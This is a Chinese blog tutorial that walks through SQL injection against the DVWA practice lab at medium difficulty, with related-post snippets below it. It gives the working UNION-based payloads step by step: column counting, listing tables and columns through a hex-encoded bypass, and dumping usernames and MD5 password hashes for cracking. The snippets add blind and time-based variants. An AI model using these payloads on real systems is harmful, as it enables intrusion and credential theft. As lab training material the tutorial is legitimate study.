注入id列表_SQL注入--dvwa靶场--medium注入详解

最新推荐文章于 2024-04-05 10:27:39 发布
最新推荐文章于 2024-04-05 10:27:39 发布
阅读量257 收藏 2
点赞数 1
文章标签: 注入id列表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39579483/article/details/111703618
版权

SQL注入 数据库漏洞 MD5解密 安全测试 信息泄露
关键词由CSDN通过智能技术生成

medium等级提供了下拉列表选择user ID

57ff2e53a9a9dff0049b412d838d0416.png

这个时候是没有输入框的,那么想要注入就抓包试试(burpsuit)

1d76aed164fe929e968f094598327327.png

获得数据包以后我们发现里面的ID选项是可以修改的,那么我们进行注入类型的判断

1 and 1=1成功执行

940ef501a5cb793a34eac9491ec530f6.png

31a209b3e497b8aca4f46fe6bfcb6f20.png

1 and 1=2,逻辑为假,不执行

f215fd48de8b2b615ab0decd1a34b541.png

1',报错。综上可以判断存在数字型注入。并且我们可以发现'被转义为'

8ea4a25298bb670018afed78d47e9114.png

=1 order by 1#猜解字段数

783156d80c69c28d683fc70eb46f6b60.png

=1 order by 2#

afba0eef1f6000fb056b249ad55fa5a2.png

=1 order by 3#报错,说明字段数为2

0672d308a16275bbcc9cf954080f0db0.png

1 union select 1,2#确定出回显位置有两个

bf4296564622915ab88562527c44ffef.png

1 union select 1,database()#得到数据库名称

ea047781248a3eaad4af8aa3bd5593bd.png

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

b840836fdc65c6b0b37e566df2a57d2b.png

得到dvwa中两张表名guestbook和users

考虑到单引号被转义,可以利用 16 进制进行绕过

union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

70dc48d46863ac0c8744365537073441.png

=1 union select user,password from users#获取字段内容

698dcda663b8aa68ec2d8306fc9304d9.png

最后得到的密码是经过MD5加密的,我们可以使用MD5在线解密工具对其进行解密后得到明文密码。

weixin_39579483
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 278
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
基于dvwa的sql盲注(Blind)-低
滕财然的博客
11-15 2809
目录sql盲注和sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注和sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
及其噶鼓的id——防sql注入
weixin_33802505的博客
06-12 133
最近有这样一个接口 就收的id 是 '1_2,2_3,3_4,4_6,'这种的 <?php $_POST['id'] = "1_2,2_3,3_4,4_); SELECT SLEEP(1);"; // 格式化数字数组 格式为:'1_2,2_3,3_4' if($_POST['id']){ //过滤‘_’ $idArray = ...
SQL注入
qq_37887141的博客
10-28 1810
SQL注入学习笔记
sql注入(笔记)
idooooo的博客
07-18 690
mysql注入一般注入,select注入 1.注释符号# /* --2.过滤空格注入使用/**/或()或+代替空格%0c = form feed, new page %09 = horizontal tab %0d = carriage return %0a = line feed, new line 3.多条显示 concat() group_concat() concat_ws() #
DVWA靶场通关之SQL Injection
sunxueer的博客
07-19 1093
SQL Injection 以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008 一. low 1. 求闭合字符 输入1 1' and 1=1 # 可能存在单引号sql注入 2. 求列数 1' and 1=1 order by 2# 1' and 1=1 order by 3# 说明有两列 3. 求显示位 1' and 1=2 union select 1,2 # 4. 爆数据名 1' and 1=2 union select 1,database()
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 737
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA靶场SQL注入通关详解,2024年网络安全进阶者的新篇章
最新发布
m0_61068088的博客
04-05 888
判断存在SQL注入后,接下来通过order by语句来猜解字段数。当在输入框输入1’order by 3#时,页面出现不一样的界面,因此这里的字段数有两个。接下来,再通过union select来确定回显位置。如下图所示,回显位置为第二个。获取当前数据库(union select 1,database()),可以得到数据库为dvwa
20201224DVWA-SQL注入(SQL inject)模块全难度详解
qq_45290991的博客
01-12 340
目录 SQL注入的思路 low medium high SQL注入的思路 1.判断是否存在注入注入是字符型还是数字型 1’ 1 or 1=1# 2.猜解SQL查询语句的字段数 orderby 4.获取当前数据库 database() 5.获取数据库的表 table_name from informatio...
DVWA-master.zip
08-22
DVWA靶场是一个强大的学习工具,涵盖了Web安全的多个重要领域。通过实践,你可以增强对Web应用安全的理解,提高自己在实际工作识别和防止安全威胁的能力。无论你是网络安全新手还是经验丰富的专业人士,DVWA都能为...
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2358
id和万能密码
sql注入
m0_66618018的博客
10-25 606
SQL手工注入
sql注入详解
m0_67392811的博客
06-12 6013
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没
渗透学习-靶场篇-dvwa靶场详细攻略(持续更新-目前只更新sql注入部分)
qq_43696276的博客
06-10 2660
在完成基础学习后,现在开始正式的打dvwa靶场。由于目前,主要只学习了sql注入,因此,对于dvwa靶场的攻略仅有sql注入的部分。
DVWA靶场
nidaxin的博客
01-29 2716
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
SQL注入-攻入Apple ID钓鱼网站实录
weixin_30252709的博客
08-27 301
之前写的一篇利用SQL注入方式攻击钓鱼网站的文章,现在在博客园再分享一下。 下午,朋友发了一条朋友圈,内容大概这样: 大体就是她的iPhone丢了,收到了钓鱼短信,多么熟悉的套路,如下: 还好她比较机智,发现是个钓鱼网站,地址如下: http://www.apple-icloudid.com.cn 当时看到这件事后,想到之前有巨巨顺势搞定钓鱼网站,所以我也想小试牛刀一下,看...
dvwa靶场(Medium)安全等级sql注入
白帽小学二年级的博客
12-16 1412
sql注入教程详解 使用burpsuite将抓到的数据包转发到repeater模块 (burpsuite使用前需要将浏览器设置代理 判断是int还是str类型,显然是int类型 用order by关键字进行数据表列数的判断 1 order by 1,2 //正常显示 1 order by 1,2,3 //报错,所以是两列 1 and 1=2 union select 1,database() //联合注入获取数据库名 1 a...
SQL注入Medium级别 和high)
weixin_64066158的博客
04-26 1032
和前天的low级别注入一样,我们可以先打开源码进行理解和分析 可以看出加入了特殊函数来过滤特殊字符,且变量的单引号不见了,可以分析出有可能为数字型注入; 打开dvwa,可以看到无法输入sql语句进行注入;这时我们要用到Burp suite进行拦截包和sql注入;从而得到我们想要的数据, 此时打开burp suite ,进行拦截并且send to repeater,用repeater进行sql注入和运行 ; 打开repeater 可以看出运行界面和运行界面的源代码(源代码在raw,我
Medium是什么
热门推荐
qq_18730155的博客
06-16 1万+
    罗永浩关于时间机器的解读提到,人类还没有能力做出时间机器,让人们可以回到过去或者穿越未来,但是,在某种特殊条件下,却可以得到跟乘坐时间机器一样的效果,比如学习,学习是一种获得前人的经验应用到自己身上的一种行为,前人的经验可能需要几十年或者几百年才能获得,但是人们通过学习,却可以在很短的时间里获得。同样的道理,如果我们在封闭的空间学习到了外边世界的先进经验,我们就相当于获得了外边世界的时间...
DVWA教程:SQL注入漏洞案例研究
"DVWASQL注入教程" 在2020年12月6日的一篇文章,作者lll-yz探讨了如何通过DVWA(Damn Vulnerable Web Application)平台进行SQL注入学习。DVWA是一个用于教育和测试Web安全的开源工具,而本文着重于其的SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值